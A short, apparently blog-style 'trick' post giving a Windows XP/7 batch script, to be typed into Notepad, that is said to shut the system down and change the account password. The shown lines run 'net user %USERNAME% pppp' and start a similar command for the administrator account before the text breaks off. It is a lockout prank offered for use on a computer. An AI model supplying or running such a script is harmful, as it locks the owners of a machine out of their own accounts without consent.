This trick based on Batch Programming by which your System shutdown and automatically change your System password by Batch Program password.This trick works both on Windows Xp and 7.
Type below write code line on "Notepad" .....
@echo off
break off
net user %USERNAME% pppp
net user administrator...